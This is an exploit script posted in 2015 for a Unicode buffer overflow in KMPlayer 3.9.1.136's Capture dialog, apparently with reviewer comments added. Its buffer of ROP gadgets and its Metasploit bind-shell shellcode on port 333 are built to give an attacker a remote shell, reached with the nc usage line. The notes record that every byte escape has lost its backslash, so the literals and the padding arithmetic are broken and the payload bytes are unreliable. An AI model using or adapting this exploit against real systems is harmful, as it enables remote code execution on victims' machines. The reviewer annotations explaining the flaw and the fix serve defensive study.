
KMPlayer 3.9.1.136 Buffer Overflow

Posted on 24 June 2015

#!/usr/bin/python
#
# KMPlayer 3.9.1.136 Capture Unicode Buffer Overflow (ASLR Bypass)
#
# Author: Naser Farhadi
#
# Date: 21 June 2015
# Version: 3.9.1.136
# Tested on: Windows 7 SP1 (32 bit)
#
# Usage:
# chmod +x KMPlayer.py
# python KMPlayer.py
# Alt+c | Video Capture | Alt+a | Audio Capture
# paste content of KMPlayer.txt into Filename
# nc 172.20.10.14 333
#
# Video: http://youtu.be/9gtZxR2ioTM
##
#
# NOTE(review): this script does nothing beyond writing a crafted string to
# KMPlayer.txt; the memory-safety defect it demonstrates is in KMPlayer's
# Capture dialog "Filename" field, which (per the header) copies the value
# without a length check after Unicode expansion. The defensive fix is a
# bounds-checked copy of that field; ASLR/DEP on every loaded module would
# additionally remove the static gadget addresses this PoC relies on.
#
# NOTE(review): in this copy of the listing the backslash of every "\xNN"
# escape has been lost, so each "xNN" below is a plain three-character ASCII
# string rather than one byte. The inline comments (PUSH EAX for 0x50, etc.)
# describe the intended byte values, not what these literals currently hold.
# The length arithmetic at the bottom is affected in the same way.
#
# Layout (as annotated by the author): a short stack-pivot/setup sequence,
# then 125 repetitions of POP EDI interleaved with padding, then a few
# gadgets whose addresses are taken from KMPlayer.exe itself. "Venetian
# Padding" refers to the filler bytes needed because the target widens the
# input to UTF-16 (a 0x00 is inserted after every byte), which is why the
# sequence is built from single ASCII-range values. Gadgets being sourced
# from the main executable is consistent with the "ASLR Bypass" claim —
# presumably that module is not built with /DYNAMICBASE; confirm against
# the binary.
buffer = (
    "x50"  # PUSH EAX
    "x40"  # Venetian Padding
    "x5c"  # POP ESP
    "x40"  # Venetian Padding
    "x61"  # POPAD
    "x45"  # Venetian Padding
    ""+("x5fx45" * 125)+""  # (POP EDI/Venetian Padding)*125
    "x54"  # PUSH ESP
    "x45"  # Venetian Padding
    "x45"  # Venetian Padding
    "x45"  # Venetian Padding
    "x61"  # POPAD
    "x47"  # Venetian Padding
    "x33x77"  # POP EBP/RETN from KMPlayer.exe
    "x58"  # POP EAX
    "x47"  # Venetian Padding
    "x33x77"  # POP EBP/RETN from KMPlayer.exe
    "x58"  # POP EAX
    "x47"  # Venetian Padding
    "x33x77"  # POP EBP/RETN from KMPlayer.exe
    "x5d"  # POP EBP
    "x47"  # Venetian Padding
    "x71"  # Venetian Padding
    "x71"  # Venetian Padding
)

# msfpayload windows/shell_bind_tcp LPORT=333 R|msfencode -e x86/unicode_mixed BufferRegister=ESP -t c
#
# Per the command above, this is a Metasploit bind-shell payload listening on
# TCP port 333 (matching the "nc ... 333" usage line), Unicode-encoded so it
# survives the same UTF-16 widening as the buffer. On a host, an unexpected
# listener on that port after the dialog is used is the observable effect.
shellcode = (
    "x54x47x59x41x49x41x49x41x49x41x49x41x49x41x49"
    "x41x49x41x49x41x49x41x49x41x49x41x49x41x49x41"
    "x49x41x6ax58x41x51x41x44x41x5ax41x42x41x52x41"
    "x4cx41x59x41x49x41x51x41x49x41x51x41x49x41x68"
    "x41x41x41x5ax31x41x49x41x49x41x4ax31x31x41x49"
    "x41x49x41x42x41x42x41x42x51x49x31x41x49x51x49"
    "x41x49x51x49x31x31x31x41x49x41x4ax51x59x41x5a"
    "x42x41x42x41x42x41x42x41x42x6bx4dx41x47x42x39"
    "x75x34x4ax42x69x6cx39x58x31x72x79x70x4dx30x39"
    "x70x53x30x75x39x67x75x4ex51x35x70x62x44x52x6b"
    "x70x50x6ex50x52x6bx52x32x4cx4cx54x4bx72x32x4b"
    "x64x42x6bx52x52x4dx58x5ax6fx38x37x6fx5ax6cx66"
    "x4cx71x59x6fx36x4cx4dx6cx30x61x51x6cx4ax62x6c"
    "x6cx6fx30x69x31x78x4fx4ax6dx59x71x77x57x67x72"
    "x4bx42x70x52x6ex77x62x6bx6ex72x6ax70x32x6bx6e"
    "x6ax6dx6cx74x4bx30x4cx5ax71x32x58x49x53x70x48"
    "x6dx31x57x61x4ex71x44x4bx61x49x6dx50x6ax61x4a"
    "x33x72x6bx71x39x6ex38x58x63x6dx6ax70x49x62x6b"
    "x6cx74x74x4bx4dx31x58x56x4dx61x69x6fx54x6cx76"
    "x61x78x4fx7ax6dx69x71x47x57x4fx48x57x70x43x45"
    "x58x76x5ax63x61x6dx59x68x6fx4bx61x6dx6cx64x33"
    "x45x57x74x30x58x54x4bx30x58x6dx54x69x71x37x63"
    "x70x66x44x4bx4cx4cx70x4bx34x4bx6fx68x4dx4cx59"
    "x71x68x53x64x4bx6cx44x44x4bx5ax61x78x50x73x59"
    "x51x34x6cx64x6ex44x61x4bx4fx6bx43x31x4fx69x31"
    "x4ax70x51x49x6fx49x50x71x4fx61x4fx70x5ax72x6b"
    "x6cx52x48x6bx64x4dx51x4dx72x48x6cx73x70x32x49"
    "x70x49x70x33x38x43x47x52x53x4dx62x71x4fx4ex74"
    "x70x68x50x4cx44x37x6cx66x6cx47x39x6fx47x65x37"
    "x48x42x70x6ax61x4dx30x39x70x4dx59x37x54x42x34"
    "x30x50x33x38x4bx79x35x30x42x4bx59x70x4bx4fx46"
    "x75x31x5ax39x78x30x59x30x50x37x72x39x6dx31x30"
    "x42x30x4dx70x72x30x61x58x38x6ax4cx4fx57x6fx77"
    "x70x79x6fx66x75x56x37x53x38x6bx52x39x70x79x71"
    "x4ex6dx61x79x67x76x62x4ax4ax70x52x36x6ex77x51"
    "x58x57x52x59x4bx70x37x62x47x49x6fx38x55x72x37"
    "x42x48x74x77x69x59x4fx48x69x6fx69x6fx76x75x6f"
    "x67x63x38x52x54x5ax4cx4fx4bx68x61x79x6fx68x55"
    "x31x47x46x37x62x48x54x35x72x4ex6ex6dx50x61x69"
    "x6fx77x65x63x38x62x43x62x4dx42x44x6dx30x75x39"
    "x58x63x32x37x6ex77x50x57x50x31x6ax56x71x5ax6e"
    "x32x32x39x51x46x59x52x49x6dx52x46x38x47x70x44"
    "x4fx34x4fx4cx4dx31x6bx51x74x4dx6ex64x6fx34x6c"
    "x50x76x66x6bx50x6ex64x51x44x32x30x50x56x71x46"
    "x6ex76x4fx56x70x56x50x4ex62x36x6fx66x70x53x71"
    "x46x51x58x54x39x46x6cx6dx6fx31x76x4bx4fx79x45"
    "x34x49x59x50x50x4ex6fx66x50x46x4bx4fx30x30x63"
    "x38x6cx48x54x47x6dx4dx33x30x39x6fx66x75x75x6b"
    "x68x70x37x45x44x62x30x56x53x38x54x66x74x55x65"
    "x6dx53x6dx4bx4fx79x45x6dx6cx59x76x43x4cx6ax6a"
    "x35x30x4bx4bx59x50x70x75x6bx55x55x6bx30x47x7a"
    "x73x33x42x50x6fx30x6ax59x70x32x33x6bx4fx79x45"
    "x41x41"
)

# Pad the payload out to a fixed total of 1534 characters so the overall
# input length is constant regardless of shellcode size.
# NOTE(review): with the escapes lost (see above) len(shellcode) is roughly
# three times the intended byte count and exceeds 1534, so the repeat count
# is negative and the padding term evaluates to "".
buffer += shellcode + "x71" * (1534 - len(shellcode))

# Write the result for the user to paste into the Capture dialog. Written
# against Python 2 (str literals are byte strings there); on Python 3 a str
# cannot be written to a file opened in binary mode. The handle is never
# explicitly closed — a `with open(...) as f:` block would be the usual form.
open("KMPlayer.txt", "wb").write(buffer)

 
